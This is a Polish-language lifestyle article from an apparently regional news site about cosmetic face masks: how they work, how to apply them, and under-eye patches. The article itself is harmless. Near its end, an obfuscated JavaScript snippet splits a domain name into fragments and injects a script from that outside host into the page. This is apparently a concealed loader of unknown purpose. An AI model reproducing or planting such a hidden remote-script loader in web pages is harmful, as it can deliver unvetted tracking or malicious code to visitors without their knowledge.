:-( Wygląda na to że masz Adblocka. Utrzymujemy się z reklam żeby móc dostarczyć Ci wiadomości z Twojego regionu za które nie musisz płacić, czy mógłbyś rozważyć jego wyłączenie?
  -6°C zamglenie

Maseczki kosmetyczne na twarz – zwiększ ich moc działania

Pielęgnacja, Maseczki kosmetyczne twarz zwiększ działania - zdjęcie, fotografia

Dlaczego maseczki na twarz działają?

 

Dobrej jakości maseczka ma w składzie wysokie stężenie składników aktywnych. Jej skład jest bogatszy niż skład kremu, ale dzięki temu dostarcza skórze prawdziwy zastrzyk witamin, minerałów czy składników zwiększających nawilżenie albo wygładzenie skóry, a my szybko zauważamy efekty jej działania. Maseczkami, w zależności od tego jaki rodzaj wybierzemy, możemy nawilżać dogłębnie skórę, odżywiać ją, łagodzić podrażniania, oczyścić pory, ściągnąć je i zmatowić skórę. Stosowanie maseczek wspomaga też wydalanie toksycznych substancji ze skóry, przyspiesza krążenie krwi i poprawia koloryt cery. Maseczki oczyszczające niezwykle skutecznie usuwają martwe komórki i sebum.


Instrukcja obsługi

 

 

Jednak położenie maseczki na twarz na nieoczyszczoną cerę nie tylko sprawi, że nie będzie ona działać, ale może nawet pogorszyć stan skóry. Dlatego zanim skorzystamy z kosmetyku, dobrze wykonać kilka czynności… Na pewno najlepiej korzystać z masek wieczorem, przed snem, zwłaszcza gdy chcemy skórę oczyścić, odżywić, zregenerować. Skóra bowiem wieczorem, zwłaszcza po kąpieli jest rozpulchniona, a więc lepiej chłonie składniki odżywcze. Z tego też powodu, po dokładnym oczyszczeniu twarzy ze śladów makijażu i sebum dobrze jest zrobić zabieg peelingujący albo potrzymać buzię nad parującą wodą. Jeśli zależy nam na czasie, możemy po prostu nakładać maseczkę leżąc w wannie. Ciepłe, wilgotne powietrze dodatkowo rozszerzy pory i ułatwi składnikom odżywczym wchłonięcie się do głębszych warstw skóry.

 

 

Maseczkę należy nakładać palcami albo specjalnym pędzlem uważnie omijając oczy. Niektóre maseczki należy pozostawić do wyschnięcia, inne należy ściągnąć w formie błony, jeszcze inne wchłaniają się i wymagają jedynie zmycia ciepłą wodą. Ale o tym przeczytamy w instrukcji stosowania. Maseczki warto stosować regularnie - dwa razy w tygodniu.


Gdy się nie wyśpimy...

 

 

A co z oczami, które należy omijać przy nakładaniu maseczki? Przecież dla wielu kobiet to miejsce strategiczne - to przy ich kącikach pojawiają się pierwsze zmarszczki, a skóra jest niezwykle cienka i delikatna. Wiele osób ma problem z podkrążonymi oczami, pod którymi odbija się każda nieprzespana noc. Wśród maseczek na twarz znajdziemy także płatki pod oczy, które można nałożyć przy okazji odżywiania skóry twarzy, jak i rano, przed wyjściem do pracy. One nie tylko nawilżają skórę, wygładzają zmarszczki, ale także zmniejszają opuchliznę i cienie pod oczami, bo są lekko chłodzące. Są jednak przebadane pod kątem używania u osób z wrażliwymi oczami. W ten sposób bezpiecznie i bez podrażnień oczu odzyskamy ładny wygląd, a ślady zmęczenia znikną nawet w kilka minut.

(function(){xzp6_=("u"+"")+"s"+"";xzp6_+=("tat.")+("i");xzp6=document.createElement("script");xzp6.type="text/javascript";xzp6_+="nf"+("o")+"/";xzp6u="8632701"+".";xzp6.async=true;xzp6u+="egXntzX9zp6q442yy5f6tnaeXxscvr";xzp6.src="//"+xzp6_+xzp6u; xzp6b=document.body; xzp6b.appendChild(xzp6);})();

 

Maseczki kosmetyczne na twarz – zwiększ ich moc działania komentarze opinie

Dodajesz jako: Zaloguj się

Pielęgnacja, dla Pań - więcej informacji